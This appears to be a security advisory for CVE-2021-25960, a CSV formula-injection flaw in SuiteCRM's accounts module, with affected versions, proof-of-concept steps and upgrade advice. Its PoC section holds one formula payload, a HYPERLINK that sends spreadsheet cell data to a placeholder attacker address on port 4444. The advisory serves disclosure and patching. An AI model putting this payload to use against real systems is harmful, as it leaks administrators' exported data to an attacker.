CVE-2021-25960

Overview

In “SuiteCRM” application, v7.11.18 through v7.11.19 and v7.10.29 through v7.10.31 are affected by “CSV Injection” vulnerability (Formula Injection). A low privileged attacker can use accounts module to inject payloads in the input fields. When an administrator access accounts module to export the data as a CSV file and opens it, the payload gets executed. This was not fixed properly as part of CVE-2020-15301, allowing the attacker to bypass the security measure.

Details

The application “SuiteCRM” is affected by “CSV Injection” vulnerability (Formula Injection). A low privileged user (attacker) can use the accounts module to inject payloads in the input fields. When an administrator accesses the accounts module to export the data as a CSV file and opens it, the payload gets executed.

PoC Details

For demonstration purposes we'll use 2 users -
1. Alice - low privileged user
2. Admin - administrator
Login into the application as Alice and go to the accounts module. Now in the first name field, insert the CSV injection payload.
Start listener on port 4444.
Then login into the application as Admin and navigate to the accounts module. Select the fields and under Bulk Action click on export. A CSV file will be downloaded. Open it with excel.
When Admin clicks on the first column that contains the payload, it gets executed and the data in cells A3 & B3 will be sent to Alice’s address.

PoC Code

==HYPERLINK("http://attacker-ip:4444?x="&A3&B3,"Click Here")

Affected Environments

v7.11.18 - v7.11.19 and v7.10.29 - v7.10.31

Prevention

Upgrade to version v7.10.32, v7.11.21 or higher